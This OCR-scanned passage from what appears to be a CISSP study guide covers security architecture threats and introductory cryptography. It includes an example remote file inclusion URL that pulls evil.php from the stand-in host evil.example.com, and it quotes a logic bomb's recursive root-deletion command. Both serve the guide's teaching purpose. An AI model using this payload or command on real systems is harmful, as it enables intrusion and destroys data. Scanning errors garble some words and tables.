usually lacking, and straightforward issues such as patching can be difficult (if not 
impossible). Vendors often release base operating system patches quite slowly, and 
commonly end support for devices that are still in widespread use. 

Here is the (condensed) nmap network mapper output for a Samsung Smart TV, 
showing it is most likely running Linux: 

PORT STATE SERVICE 

6000/tcp open Xll 
7676/tcp open imqbrokerd 
9090/tcp open zeus-admin 

MAC Address: DC : 71 : 44 : 17 : 44 : 83 (Samsung Electro Mechanics) 

Device type: general purpose 
Running: Linux 2.6.X 

OS CPE: cpe : /o : linux : linux_kernel : 2 . 6 
OS details: Linux 2.6.17 - 2.6.36 


SYSTEM VULNERABILITIES, THREATS 
AND COUNTERMEASURES 

System Threats, Vulnerabilities, and Countermeasures describe security architec- 
ture and design vulnerabilities, and the corresponding exploits that may compromise 
system security. We will also discuss countermeasures, or mitigating actions that 
reduce the associated risk. 

EMANATIONS 

Emanations are energy that escapes an electronic system, which may be remotely 
monitored under certain circumstances. Energy includes electromagnetic interfer- 
ence, discussed later in this chapter. 

Wired Magazine discussed the discovery of electronic emanations in the article 
“Declassified NSA Document Reveals the Secret History of TEMPEST”: “It was 
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1943, and an engineer with Bell Telephone was working on one of the U.S. govern- 
ment’s most sensitive and important pieces of wartime machinery, a Bell Telephone 
model 131-B2... Then he noticed something odd. Far across the lab, a freestanding 
oscilloscope had developed a habit of spiking every time the teletype encrypted a 
letter. Upon closer inspection, the spikes could actually be translated into the plain 
message the machine was processing. Though he likely did not know it at the time, 
the engineer had just discovered that all information processing machines send their 
secrets into the electromagnetic ether.” [13] 

As a result of this discovery, TEMPEST (not an acronym, but a codename by the 
United States National Security Agency) was developed as a standard for shielding 
electromagnetic emanations from computer equipment. 

COVERT CHANNELS 

A covert channel is any communication that violates security policy. The communi- 
cation channel used by malware installed on a system that locates Personally Iden- 
tifiable Information (PII) such as credit card information and sends it to a malicious 
server is an example of a covert channel. Two specific types of covert channels are 
storage channels and timing channels. 

The opposite of a covert channel is an overt channel: authorized communication 
that complies with security policy. 

Covert Storage Channels 

A storage channel example uses shared storage, such as a temporary directory, to 
allow two subjects to signal each other. Imagine Alice is a subject with a top secret 
clearance, and Bob is a secret-cleared subject. Alice has access to top secret infor- 
mation that she wishes to share with Bob, but the mandatory access control (MAC) 
system will prevent her from doing so. 

Bob can see the size of Alice’s temporary files, but not the contents. They de- 
velop a code: a megabyte file means war is imminent (data labeled top secret), and a 
O-byte file means “all clear.” Alice maintains a O-byte file in the temporary directory 
until war is imminent, changing it to a 1 -megabyte file, signaling Bob in violation of 
the system’s MAC policy. 

Covert Timing Channels 

A covert timing channel relies on the system clock to infer sensitive information. An 
example of a covert timing channel is an insecure login system. The system is con- 
figured to say “bad username or password,” if a user types a good username with a 
bad password, or a bad username and a bad password. This is done to prevent outside 
attackers from inferring real usernames. 

Our insecure system prints “bad username or password” immediately when a 
user types a bad username/bad password, but there is a small delay (due to the time 
required to check the cryptographic hash) when a user types a good username with a 
bad password. This timing delay allows attackers to infer which usernames are good 
or bad, in violation of the system’s security design. 
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BACKDOORS 

A backdoor is a shortcut in a system that allows a user to bypass security checks 
(such as username/password authentication) to log in. Attackers will often install a 
backdoor after compromising a system. For example, an attacker gains shell access 
to a system by exploiting a vulnerability caused by a missing patch. The attacker 
wants to maintain access (even if the system is patched), so she installs a backdoor 
to allow future access. 

Maintenance hooks are a type of backdoor; they are shortcuts installed by system 
designers and programmers to allow developers to bypass normal system checks 
during development, such as requiring users to authenticate. Maintenance hooks 
become a security issue if they are left in production systems. 


MALICIOUS CODE (MALWARE) 

Malicious Code or Malware is the generic term for any type of software that attacks 
an application or system. There are many types of malicious code; viruses, worms, 
trojans, and logic bombs can cause damage to targeted systems. 

Zero-day exploits are malicious code (a threat) for which there is no vendor- 
supplied patch (meaning there is an unpatched vulnerability). 

Computer Viruses 

Computer viruses are malware that does not spread automatically: they require a 
carrier (usually a human). They frequently spread via floppy disk, and (more recently) 
portable USB (Universal Serial Bus) memory. These devices may be physically 
carried and inserted into multiple computers. 

Types of viruses include: 

• Macro virus: virus written in macro language (such as Microsoft Office or 
Microsoft Excel macros) 

• Boot sector virus: virus that infects the boot sector of a PC, which ensures that 
the virus loads upon system startup 

• Stealth virus: a virus that hides itself from the OS and other protective software, 
such as antivirus software 

• Polymorphic virus: a virus that changes its signature upon infection of a new 
system, attempting to evade signature-based antivirus software 

• Multipartite virus: a virus that spreads via multiple vectors. Also called 
multipart virus. 

Worms 

Worms are malware that self-propagates (spreads independently). The term “worm” 
was coined by John Brunner in 1975 in the science fiction story The Shockwave 
Rider. Worms typically cause damage two ways: first by the malicious code they 
carry; the second type of damage is loss of network availability due to aggressive 
self-propagation. Worms have caused some of the most devastating network attacks. 
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The first widespread worm was the Morris worm of 1988, written by Robert Tap- 
pan Morris, Jr. Many Internet worms have followed since, including the Blaster worm 
of 2003, the Sasser worm of 2004, the Conficker worm of 2008 + , and many others. 

Trojans 

A trojan (also called a Trojan horse) is malware that performs two functions: one 
benign (such as a game), and one malicious. The term derives from the Trojan horse 
described in Virgil’s poem The Aeneid. 

Rootkits 

A rootkit is malware that replaces portions of the kernel and/or operating system. A 
user-mode rootkit operates in ring 3 on most systems, replacing operating system 
components in “userland.” Commonly rootkitted binaries include the Is or ps com- 
mands on Linux/UNIX systems, or dir or tasklist on Microsoft Windows systems. 

A kernel-mode rootkit replaces the kernel, or loads malicious loadable kernel 
modules. Kernel-mode rootkits operate in ring 0 on most operating systems. 

Packers 

Packers provide runtime compression of executables. The original exe is compressed, 
and a small executable decompresser is prepended to the exe. Upon execution, the 
decompresser unpacks the compressed executable machine code and runs it. 

Packers are a neutral technology that is used to shrink the size of executables. 
Many types of malware use packers, which can be used to evade signature-based 
malware detection. A common packer is UPX (Ultimate Packer for eXecutables), 
available at http://upx.sourceforge.net/. 

Logic Bombs 

A logic bomb is a malicious program that is triggered when a logical condition is 
met, such as after a number of transactions have been processed, or on a specific date 
(also called a time bomb). Malware such as worms often contain logic bombs, behav- 
ing in one manner, and then changing tactics on a specific date and time. 

Roger Duronio of UBS PaineWebber successfully deployed a logic bomb against 
his employer after becoming disgruntled due to a dispute over his annual bonus. He 
installed a logic bomb on 2000 UBS PaineWebber systems, triggered by the date and 
time of March 4, 2002 at 9:30 AM: “This was the day when 2000 of the company’s 
servers went down, leaving about 17,000 brokers across the country unable to make 
trades. Nearly 400 branch offices were affected. Files were deleted. Backups went 
down within minutes of being run.” [14] 

Duronio’ s code ran the command “/usr/sbin/mrm -r / &” (a UNIX shell com- 
mand that recursively deletes the root partition, including all files and subdirecto- 
ries). He was convicted, and sentenced to 8 years and 1 month in federal prison. 

Antivirus Software 

Antivirus software is designed to prevent and detect malware infections. Signature- 
based antivirus uses static signatures of known malware. Heuristic-based antivirus 
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bank.example.com evil.example.com 

FIGURE 4.15 Server-Side Attack 


uses anomaly-based detection to attempt to identify behavioral characteristics of 
malware, such as altering the boot sector. 

SERVER-SIDE ATTACKS 

Server-side attacks (also called service-side attacks) are launched directly from an 
attacker (the client) to a listening service. The “Conficker” worm of 2008+ spread 
via a number of methods, including a server-side attack on TCP port 445, exploiting 
a weakness in the RPC service. Windows systems that lacked the MS08-067 patch 
(and were not otherwise protected or hardened) were vulnerable to this attack. More 
details on Conficker are available at: http://mtc.sri.com/Conficker. 

The attack is shown in Figure 4.15, where evil.example.com launches an attack 
on bank.example.com, listening on TCP port 445. 

Patching, system hardening, firewalls, and other forms of defense-in-depth miti- 
gate server-side attacks. Organizations should not allow direct access to server ports 
from untrusted networks such as the Internet, unless the systems are hardened and 
placed on DMZ networks, which we will discuss in Chapter 5, Domain 4: Commu- 
nication and Network Security. 


NOTE 

Server-side attacks exploit vulnerabilities in installed services. This is not exclusively a “server” 
problem (like a file server running the Windows 2012 operating system): desktops and laptops 
running operating systems such as Ubuntu Linux 15.04 and Windows 10 also run services, and 
may be vulnerable to server-side attacks. Some prefer the term “service-side attack” to make this 
distinction clear, but the exam uses the term “server-side.” 


CLIENT-SIDE ATTACKS 

Client-side attacks occur when a user downloads malicious content. The flow of 
data is reversed compared to server-side attacks: client-side attacks initiate from the 
victim who downloads content from the attacker, as shown in Figure 4.16. 

Client-side attacks are difficult to mitigate for organizations that allow Internet 
access. Clients include word processing software, spreadsheets, media players, 
Web browsers, etc. Browsers such as Internet Explorer and Firefox are actually 
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FIGURE 4.16 Client-Side Attack 


a collection of software: the browser itself, plus third-party software such as 
Adobe Acrobat Reader, Adobe Flash, iTunes, QuickTime, RealPlayer, etc. All are 
potentially vulnerable to client-side attacks. All client-side software must be patched, 
a challenge many organizations struggle with. 

Most firewalls are far more restrictive inbound compared to outbound: they were 
designed to “keep the bad guys out,” and mitigate server-side attacks originating 
from untrusted networks. They often fail to prevent client-side attacks. 

WEB ARCHITECTURE AND ATTACKS 

The World Wide Web of 10 years ago was a simpler Web: most Web pages were 
static, rendered in HTML. The advent of “Web 2.0,” with dynamic content, multi- 
media, and user-created data has increased the attack surface of the Web: creating 
more attack vectors. Dynamic Web languages such as PHP (a “recursive acronym” 
that stands for PHP: Hypertext Preprocessor) make Web pages far more powerful 
and dynamic, but also more susceptible to security attacks. 

An example PHP attack is the “remote hie inclusion” attack. A URL (Universal 
Resource Locator) such as “http://good. example. com/index. php?hle=readme.txt” 
references a PHP script called index. php. That script dynamically loads the hie refer- 
enced after the “?,” readme.txt, which displays in the user’s Web browser. 

An attacker hosts a malicious PHP hie called “evil. php” on the Web server evil. 
example.com, and then manipulates the URL, entering: 


http : //good. example . com/ index . php?f ile=http : / / evil . example . com/e 
vil .php 


If good.example.com is poorly conhgured, it will download evil. php, and execute 
it locally, allowing the attacker to steal information, create a backdoor, and perform 
other malicious tasks. 

Applets 

Applets are small pieces of mobile code that are embedded in other software such 
as Web browsers. Unlike HTML (Hyper Text Markup Language), which provides a 
way to display content, applets are executables. The primary security concern is that 
applets are downloaded from servers, and then run locally. Malicious applets may be 
able to compromise the security of the client. 
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Applets can be written in a variety of programming languages; two prominent 
applet languages are Java (by Oracle/Sun Microsystems) and ActiveX (by Micro- 
soft). The term “applet” is used for Java, and “control” for ActiveX, though they are 
functionally similar. 

Java 

Java is an object-oriented language used not only to write applets, but also as a 
general-purpose programming language. Java bytecode is platform-independent: it is 
interpreted by the Java Virtual Machine (JVM). The JVM is available for a variety of 
operating systems, including Linux, FreeBSD, and Microsoft Windows. 

Java applets run in a sandbox, which segregates the code from the operating 
system. The sandbox is designed to prevent an attacker who is able to compromise 
a java applet from accessing system files, such as the password file. Code that runs 
in the sandbox must be self-sufficient: it cannot rely on operating system files that 
exist outside the sandbox. A trusted shell is a statically compiled shell (it does not use 
operating system shared libraries), which can be used in sandboxes. 

ActiveX 

ActiveX controls are the functional equivalent of Java applets. They use digital cer- 
tificates instead of a sandbox to provide security. ActiveX controls are tied more 
closely to the operating system, allowing functionality such as installing patches via 
Windows Update. Unlike Java, ActiveX is a Microsoft technology that works on 
Microsoft Windows operating systems only. 

OWASP 

The Open Web Application Security Project (OWASP, see: http://www.owasp. 
org) represents one of the best application security resources. OWASP provides a 
tremendous number of free resources dedicated to improving organizations’ applica- 
tion security posture. One of their best-known projects is the OWASP Top 10 proj- 
ect, which provides consensus guidance on what are considered to be the ten most 
significant application security risks. The OWASP Top 10 is available at https:// 
www.owasp. 0 rg/index.php/Category:OWASP_Top_Ten_Project. 

In addition to the wealth of information about application security threats, vulner- 
abilities, and defenses, OWASP also maintains a number of security tools available 
for free download including a leading interception proxy: ZAP, the Zed Attack Proxy. 

XML 

XML (Extensible Markup Language) is a markup language designed as a stan- 
dard way to encode documents and data. XML is similar to, but more universal 
than, HTML. XML is used on the Web, but is not tied to it: XML can be used to 
store application configuration, output from auditing tools, and many other uses. 
Extensible means users may use XML to define their own data formats. 

Service Oriented Architecture (SOA) 

Service Oriented Architecture (SOA) attempts to reduce application architecture down 
to a functional unit of a service. SOA is intended to allow multiple heterogeneous 


System Vulnerabilities, Threats and Countermeasures 143 


applications to be consumers of services. The service can be used and reused 
throughout an organization rather than built within each individual application that 
needs the functionality offered by the service. 

Services are expected to be platform independent and able to be called in a 
generic way not dependent upon a particular programming language. The intent is 
that any application may leverage the service simply by using standard means avail- 
able within their programming language of choice. Services are typically published 
in some form of a directory that provides details about how the service can be used, 
and what the service provides. 

Though Web Services are not the only example they are the most common example 
provided for the SOA model. XML or JSON (JavaScript Object Notation) is commonly 
used for the underlying data structures of web services, SOAP (originally an acronym 
for ‘Simple Object Access Protocol,’ but now simply ‘SOAP’) or REST (Representa- 
tional State Transfer) provides the connectivity, and the WSDL (Web Services Descrip- 
tion Language) provides details about how the Web Services are to be invoked. 


EXAM WARNING 


Do not confuse Service Oriented Architecture (SOA) with SOAP. They are related, but different 
concepts: SOA may use SOAP for connectivity. 


DATABASE SECURITY 

Databases present unique security challenges. The sheer amount of data that may be 
housed in a database requires special security consideration. As we will see shortly 
in the “Inference and Aggregation” section, the logical connections database users 
may make by creating, viewing, and comparing records may lead to inference and 
aggregation attacks, requiring database security precautions such as inference controls 
and polyinstantiation. 

Polyinstantiation 

Polyinstantiation allows two different objects to have the same name. The name is 
based on the Latin roots for multiple (poly) and instances (instantiation). Database 
polyinstantiation means two rows may have the same primary key, but different data. 

Imagine you have a multilevel secure database table. Each tuple (a tuple is a row, 
or an entry in a relational database) contains data with a security label of confidential, 
secret, or top secret. Subjects with the same three clearances can access the table. 
The system follows mandatory access control rules, including “no read up:” a secret 
subject cannot read an entry labeled top secret. 

A manager with a secret clearance is preparing to lay off some staff, opens the 
“layoffs” table, and attempts to create an entry for employee John Doe, with a primary 
key of 123-45-6789. The secret subject does not know that an entry already exists for 
John Doe with the same primary key, labeled top secret. In fact entries labeled top 
secret exist for the entire department, including the manager: the entire department is 
going to be laid off. This information is labeled top secret: the manager cannot read it. 
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Databases normally require that all rows in a table contain a unique primary key, 
so a normal database would generate an error like “duplicate entry” when the man- 
ager attempts to insert the new entry. The multilevel secure database cannot do that 
without allowing the manager to infer top secret information. 

Polyinstantiation means the database will create two entries with the same 
primary key: one labeled secret, and one labeled top secret. 

Inference and Aggregation 

Inference and aggregation occur when a user is able to use lower level access to 
learn restricted information. These issues occur in multiple realms, including data- 
base security. 

Inference requires deduction: there is a mystery to be solved, and lower level 
details provide the clues. Aggregation is a mathematical process: a user asks every 
question, receives every answer, and derives restricted information. 


LEARN BY EXAMPLE 

Pentagon Pizza Inference 

The United States Pentagon ordered a lot of pizza on the evening of January 16, 1991, far more than 
normal. The sheer volume of pizza delivery cars allowed many people without United States Military 
clearances to see that a lot of people were working long hours, and therefore infer that something 
big was going on. They were correct; Operation Desert Storm (aka Gulf War I) was about to launch: 
“Outside of technology, Maj. Ceralde cited an example of how ‘innocuous’ bits of information can give 
a snapshot of a bigger picture. He described how the Pentagon parking lot had more parked cars than 
usual on the evening of January 16, 1991, and how pizza parlors noticed a significant increase of pizza to 
the Pentagon and other government agencies. These observations are indicators, unclassified information 
available to all, Maj. Ceralde said. That was the same night that Operation Desert Storm began.” [15] 


Inference requires deduction: clues are available, and a user makes a logical 
deduction. It is like a detective solving a crime: “Why are there so many pizza 
delivery cars in the Pentagon parking lot? A lot of people must be working all 
night... I wonder why?” In our database example, polyinstantiation is required to 
prevent the manager from inferring that a layoff is already planned for John Doe. 

Aggregation is similar to inference, but there is a key difference: no deduction 
is required. Aggregation asks every question, receives every answer, and the user 
assembles restricted information. 

Imagine you have an online phone database. Regular users can resolve a name, 
like Jane Doe, to a number, like 555-1234. They may also perform a reverse lookup, 
resolving 555-1234 to Jane Doe. Normal users cannot download the entire database: 
only phone administrators can do so. This is done to prevent salespeople from down- 
loading the entire phone database and cold calling everyone in the organization. 

Aggregation allows a normal user to download the entire database, and receive 
information normally restricted to the phone administrators. The aggregation 
attack is launched when a normal user performs a reverse lookup for 555-0000, 
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then 555-0001, then 555-0002, etc., until 555-9999. The user asks every question 
(reverse lookup for every number in a phone exchange), receives every answer, and 
aggregates the entire phone database. 

Inference and Aggregation Controls 

Databases may require inference and aggregation controls. A real-world inference 
control based on the previous “Pentagon Pizza” learn by example would be food 
service vendors with contracts under NDA, required to securely deliver flexible 
amounts of food on short notice. 

An example of a database inference control is polyinstantiation. Database aggre- 
gation controls may include restricting normal users to a limited amount of queries. 

Data Mining 

Data mining searches large amounts of data to determine patterns that would 
otherwise get “lost in the noise.” Credit card issuers have become experts in data 
mining, searching millions of credit card transactions stored in their databases to 
discover signs of fraud. Simple data mining rules, such as “X or more purchases, in Y 
time, in Z places” can be used to discover credit cards that have been stolen and used 
fraudulently. 

Data mining raises privacy concerns: imagine if life insurance companies used 
data mining to track purchases such as cigarettes and alcohol, and denied claims 
based on those purchases. 

Data Analytics 

Data analytics can play a role in database security by allowing the organization to 
better understand the typical use cases and a baseline of what constitutes typical or 
normal interaction with the database. Understanding what normal operations looks 
like can potentially allow the organization to more proactively identify abuse from 
insider threats or compromised accounts. Given the rather high likelihood that signif- 
icant and/or sensitive data is housed within a database, any tools that can improve the 
organization’s facility for detecting misuse could be a significant boon to security. 

COUNTERMEASURES 

The primary countermeasure to mitigate the attacks described in the previous section 
is defense in depth : multiple overlapping controls spanning across multiple domains, 
which enhance and support each other. Any one control may fail; defense in depth 
(also called layered defense) mitigates this issue. 

Technical countermeasures are discussed in Chapter 5, Domain 4: Communi- 
cation and Network Security. They include routers and switches, firewalls, system 
hardening including removing unnecessary services and patching, virtual private net- 
works, and others. 

Administrative countermeasures are discussed in Chapter 2, Domain 1 : Security 
and Risk Management. They include policies, procedures, guidelines, standards, and 
related documents. 
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Physical countermeasures are discussed later in this chapter. They include build- 
ing and office security, locks, security guards, mobile device encryption, and others. 


MOBILE DEVICE ATTACKS 

A recent information security challenge is mobile devices ranging from USB flash 
drives to laptops that are infected with malware outside of a security perimeter, and 
then carried into an organization. Traditional network-based protection, such as fire- 
walls and intrusion detection systems, are powerless to prevent the initial attack. 

Infected mobile computers such as laptops may begin attacking other systems 
once plugged into a network. USB flash drives can infect hosts systems via the 
Microsoft Windows “autorun” capability, where the “autorun. inf ’ file is automati- 
cally executed when the device is inserted into a system. Some types of malware 
create or edit autorun. inf in order to spread to other systems upon insertion of the 
USB flash drive. 

Mobile Device Defenses 

Defenses include administrative controls such as restricting the use of mobile 
devices via policy. The U.S. Department of Defense instituted such a policy in 2008 
after an alleged outbreak of the USB-borne SillyFDC worm. Wired.com reports: 
“The Defense Department’s geeks are spooked by a rapidly spreading worm crawl- 
ing across their networks. So they have suspended the use of so-called thumb drives, 
CDs, flash media cards, and all other removable data storage devices from their nets, 
to try to keep the worm from multiplying any further.” [16] 

Technical controls to mitigate infected flash drives include disabling the “auto- 
run” capability on Windows operating systems. This may be done locally on each 
system, or via Windows Active Directory group policy. 

Technical controls to mitigate infected mobile computers include requiring 
authentication at OSI model layer 2 via 802. IX, which we will discuss in Chapter 5, 
Domain 4: Communication and Network Security. 802. IX authentication may be 
bundled with additional security functionality, such as verification of current patches 
and antivirus signatures. Two technologies that do this are Network Access Control 
(NAC) and Network Access Protection (NAP). NAC is a network device-based solu- 
tion supported by vendors including Cisco Systems. NAP is a computer operating 
system-based solution by Microsoft. 

Another mobile device security concern is the loss or theft of a mobile device, 
which threatens confidentiality, integrity and availability of the device and the data 
that resides on it. Backups can assure the availability and integrity of mobile data. 

Full disk encryption (also known as whole disk encryption) should be used to 
ensure the confidentiality of mobile device data. This may be done in hardware or 
software, and is superior to partially-encrypted solutions such as encrypted files, 
directories or partitions. 

Remote wipe capability is another critical control, which describes the ability to 
erase (and sometimes disable) a mobile device that is lost or stolen. 
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CORNERSTONE CRYPTOGRAPHIC CONCEPTS 

Cryptography is secret writing: secure communication that may be understood by the 
intended recipient only. While the fact that data is being transmitted may be known, 
the content of that data should remain unknown to third parties. Data in motion (mov- 
ing on a network) and at rest (stored on a device such as a disk) may be encrypted. 

The use of cryptography dates back thousands of years, but is very much a part of 
our modern world. Mathematics and computers play a critical role in modern cryp- 
tography. Fundamental cryptographic concepts are embodied by strong encryption, 
and must be understood before learning about specific implementations. 

KEY TERMS 

Cryptology is the science of secure communications. Cryptography creates messages 
whose meaning is hidden; cryptanalysis is the science of breaking encrypted messages 
(recovering their meaning). Many use the term cryptography in place of cryptology: 
it is important to remember that cryptology encompasses both cryptography and 
cryptanalysis. 

A cipher is a cryptographic algorithm. A plaintext is an unencrypted message. 
Encryption converts a plaintext to a ciphertext. Decryption turns a ciphertext back 
into a plaintext. 


CONFIDENTIALITY, INTEGRITY, AUTHENTICATION 
AND NON-REPUDIATION 

Cryptography can provide confidentiality (secrets remain secret) and integrity (data 
is not altered in an unauthorized manner): it is important to note that it does not 
directly provide availability. Cryptography can also provide authentication (proving 
an identity claim). 

Additionally, cryptography can provide nonrepudiation , which is an assurance 
that a specific user performed a specific transaction and that the transaction did not 
change. The two must be tied together. Proving that you signed a contract to buy a 
car is not useful if the car dealer can increase the cost after you signed the contract. 
Nonrepudiation means the individual who performed a transaction, such as authen- 
ticating to a system and viewing personally identifiable information (PII), cannot 
repudiate (or deny) having done so afterward. 


CONFUSION, DIFFUSION, SUBSTITUTION AND PERMUTATION 

Diffusion means the order of the plaintext should be “diffused” (or dispersed) in the 
ciphertext. Confusion means that the relationship between the plaintext and cipher- 
text should be as confused (or random) as possible. Claude Shannon, the father of 
information security, in his paper Communication Theory of Secrecy Systems, first 
defined these terms in 1949. [17] 
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Cryptographic substitution replaces one character for another; this provides con- 
fusion. Permutation (also called transposition) provides diffusion by rearranging the 
characters of the plaintext, anagram-style. “ATTACKATDAWN” can be rearranged 
to “CAAKDTANTATW,” for example. Substitution and permutation are often com- 
bined. While these techniques were used historically (the Caesar Cipher is a sub- 
stitution cipher), they are still used in combination in modern ciphers such as the 
Advanced Encryption Standard (AES). 

Strong encryption destroys patterns. If a single bit of plaintext changes, the odds 
of every bit of resulting ciphertext changing should be 50/50. Any signs of non- 
randomness may be used as clues to a cryptanalyst, hinting at the underlying order 
of the original plaintext or key. 


NOTE 

The dates and names (such as Claude Shannon) associated with cryptographic breakthroughs are 
generally not testable, unless the inventor’s name appears in the name of the device or cipher. This 
information is given to flesh out the cryptographic concepts (which are very testable). 


CRYPTOGRAPHIC STRENGTH 

Good encryption is strong: for key-based encryption, it should be very difficult 
(and ideally impossible) to convert a ciphertext back to a plaintext without the key. 
The work factor describes how long it will take to break a cryptosystem (decrypt a 
ciphertext without the key). 

Secrecy of the cryptographic algorithm does not provide strength: secret algorithms 
are often proven quite weak. Strong crypto relies on math, not secrecy, to provide 
strength. Ciphers that have stood the test of time are public algorithms, such as the Tri- 
ple Data Encryption Standard (TDES) and the Advanced Encryption Standard (AES). 

MONOALPHABETIC AND POLYALPHABETIC CIPHERS 

A monoalphabetic cipher uses one alphabet: a specific letter (like “E”) is substituted 
for another (like “X”). A polyalphabetic cipher uses multiple alphabets: “E” may be 
substituted for “X” one round, and then “S” the next round. 

Monoalphabetic ciphers are susceptible to frequency analysis. Figure 4.17 shows 
the frequency of English letters in text. A monoalphabetic cipher that substituted 
“X” for “E,” “C” for “T,” etc., would be quickly broken using frequency analysis. 
Polyalphabetic ciphers attempt to address this issue via the use of multiple alphabets. 

MODULAR MATH 

Modular math lies behind much of cryptography: simply put, modular math 
shows you what remains (the remainder) after division. It is sometimes called 
“clock math” because we use it to tell time: assuming a 12-hour clock, 6 hours 
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Frequency of English letters 



past 9:00 PM is 3:00 AM. In other words, 9 + 6 is 15, divided by 12 leaves a 
remainder of 3. 

As we will see later, methods like the running-key cipher use modular math. 
There are 26 letters in the English alphabet; adding the letter “Y” (the 25th letter) to 
“C” (the third letter) equals “B” (the 2nd letter). In other words, 25 + 3 equals 28. 28 
divided by 26 leaves a remainder of 2. It is like moving in a circle (such as a clock 
face): once you hit the letter “Z,” you wrap around back to “A.” 

EXCLUSIVE OR (XOR) 

Exclusive Or (XOR) is the “secret sauce” behind modern encryption. Combining a key 
with a plaintext via XOR creates a ciphertext. XOR-ing the same key to the ciphertext 
restores the original plaintext. XOR math is fast and simple, so simple that it can be 
implemented with phone relay switches (as we will see with the Vernam Cipher). 

Two bits are true (or 1) if one or the other (exclusively, not both) is 1. In other 
words: if two bits are different the answer is 1 (true). If two bits are the same the 
answer is 0 (false). XOR uses a truth table, shown in Table 4.3. This dictates how to 
combine the bits of a key and plaintext. 

If you were to encrypt the plaintext “ATTACK AT DAWN” with a key of “UNI- 
CORN,” you would XOR the bits of each letter together, letter by letter. We will 
encrypt and then decrypt the first letter to demonstrate XOR math. “A” is binary 
01000001 and “U” is binary 01010101. We then XOR each bit of the plaintext to 
the key, using the truth table in Table 4.3. This results in a Ciphertext of 00010100, 
shown in Table 4.4. 
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Table 4.3 XOR Truth Table Table 4.4 01000001 XORed to 01010101 


X 

Y 

X XOR Y 

0 

0 

0 

0 

1 

1 

1 

0 

1 

1 

1 

0 


Plaintext 

0 

1 

0 

0 

0 

0 

0 

1 

Key 

0 

1 

0 

1 

0 

1 

0 

1 

Ciphertext 

0 

0 

0 

1 

0 

1 

0 

0 


Table 4.5 00010100 XORed to 01010101 


Ciphertext 

0 

0 

0 

1 

0 

1 

0 

0 

Key 

0 

1 

0 

1 

0 

1 

0 

1 

Plaintext 

0 

1 

0 

0 

0 

0 

0 

1 


Now let us decrypt the ciphertext 00010100 with a key of “U” (binary 01010101). 
We XOR each bit of the key (01010101) with the ciphertext (00010100), again using 
the truth table in Table 4.3. We recover our original plaintext of 01000001 (ASCII 
“A”), as shown in Table 4.5. 

DATA AT REST AND DATA IN MOTION 

Cryptography is able to protect both data at rest and data in motion (AKA data in tran- 
sit). Full disk encryption (also called whole disk encryption) of a magnetic disk drive 
using software such as TmeCrypt or PGP Whole Disk Encryption is an example of en- 
crypting data at rest. An SSL or IPsec VPN is an example of encrypting data in motion. 

PROTOCOL GOVERNANCE 

Cryptographic Protocol Governance describes the process of selecting the right 
method (cipher) and implementation for the right job, typically at an organization-wide 
scale. For example: as we will learn later in this chapter, a digital signature provides 
authentication and integrity, but not confidentiality. Symmetric ciphers are primarily 
used for confidentiality, and AES is preferable over DES due to strength and perfor- 
mance reasons (which we will also discuss later). 

Organizations must understand the requirements of a specific control, select the 
proper cryptographic solution, and ensure factors such as speed, strength, cost, com- 
plexity (and others) are properly weighed. 


HISTORY OF CRYPTOGRAPHY 

Cryptography is the oldest domain in the Common Body of Knowledge: stretching 
back thousands of years to the days of the Pharos in Egypt. Cryptography has changed 
the course of human history, playing a role in world wars and political intrigue. 
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EGYPTIAN HIEROGLYPHICS 

Hieroglyphics are stylized pictorial writing used in ancient Egypt. Some hieroglyph- 
ics contained small puzzles, meant to attract the attention of the reader, who would 
solve the simple pictorial challenge. One type of puzzle featured a serpent-like sym- 
bol in place of a letter such as “S.” This form of writing was popular from roughly 
2000 to 1000 B.C. 

The meaning was hidden, albeit weakly, and this became the first known example 
of secret writing, or cryptography. 

SPARTAN SCYTALE 

The Scytale was used in ancient Sparta around 400 B.C. A strip of parchment was 
wrapped around a rod (like the tape on a baseball or cricket bat). The plaintext was 
encrypted by writing lengthwise down the rod (across the wrapped strip). The mes- 
sage was then unwound and sent. When unwound, the words appeared as a meaning- 
less jumble. 

The receiver, possessing a rod of the same diameter, wrapped the parchment 
across the rod, reassembling the message. 

CAESAR CIPHER AND OTHER ROTATION CIPHERS 

The Caesar Cipher is a monoalphabetic rotation cipher used by Gaius Julius Caesar. 
Caesar rotated each letter of the plaintext forward three times to encrypt, so that A 
became D, B became E, etc., as shown in Table 4.6. 

Table 4.7 shows how “ATTACK AT DAWN” encrypts to “DWWDFN DW 
GDZQ” using the Caesar Cipher. Note that rotating three letters is arbitrary; any 
number of letters (other than 26, assuming an English alphabet) may be rotated for 
the same effect. 


Table 4.6 Caesar (Rot-3) Cipher 


... X Y 

Z A 

BCD 

E F 

G 

H ... 

it il il il il il il il il I il 

... A B 

C D 

E F G 

H 1 

J 

K ... 


Table 4.7 Encrypting “ATTACK AT DAWN” with the Caesar Cipher 


ROTO 


ROT 1 


ROT 2 


ROT 3 


A 

T 

T 

A 

C 

K 

A 

T 

D 

A 

W 

N 

B 

U 

u 

B 
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U 
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B 
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C 
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V 

C 

E 

M 

C 

V 

F 

C 

Y 

P 

D 

w 

w 

D 

F 
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G 

D 

Z 

Q 
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FIGURE 4.18 Vigenere Square Encrypting Plaintext “T" with a Key of “E” 


Another common rotation cipher is Rot- 13, frequently used to conceal informa- 
tion on bulletin board systems such as Usenet. For example, details that could “spoil” 
a movie for someone who had not seen it would be encoded in Rot- 13: “Qrpxneq 
vf n ercyvpnag!” Many Usenet readers had a Rot-13 function to quickly decode any 
such messages. 

Rot- 13 rotates 13 characters, so that “A” becomes “N,” “B” becomes “O,” etc. A 
nice feature of Rot- 13 is one application encrypts (albeit weakly); a second applica- 
tion decrypts (the equivalent of Rot-26, where “A” becomes “A” again). 

VIGENERE CIPHER 

The Vigenere cipher is a polyalphabetic cipher named after Blaise de Vigenere, 
a French cryptographer who lived in the 16th century. The alphabet is repeated 
26 times to form a matrix, called the Vigenere Square. Assume a plaintext of “AT- 
TACKATDAWN.” A key (such as “NEXUS”) is selected and repeated (“NEX- 
USNEXUS...”). The plaintext is then encrypted with the key via lookups to the 
Vigenere Square. Plaintext “A” becomes ciphertext “N,” and Figure 4.18 shows how 
plaintext “T” becomes ciphertext “X.” The full ciphertext is “NXQUUXEQXSJR.” 
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CIPHER DISK 

Cipher disks have two concentric disks, each with an alphabet around the periphery. 
They allow both monoalphabetic and polyalphabetic encryption. For monoalphabetic 
encryption, two parties agree on a fixed offset: “Set ‘S’ to ‘D’.” For polyalphabetic 
encryption, the parties agree on a fixed starting offset, and then turn the wheel once 
every X characters: “Set ‘S’ to ‘D,’ and then turn the inner disk 1 character to the right 
after every 10 characters of encryption.” Figure 4.19 shows a modern cipher disk. 

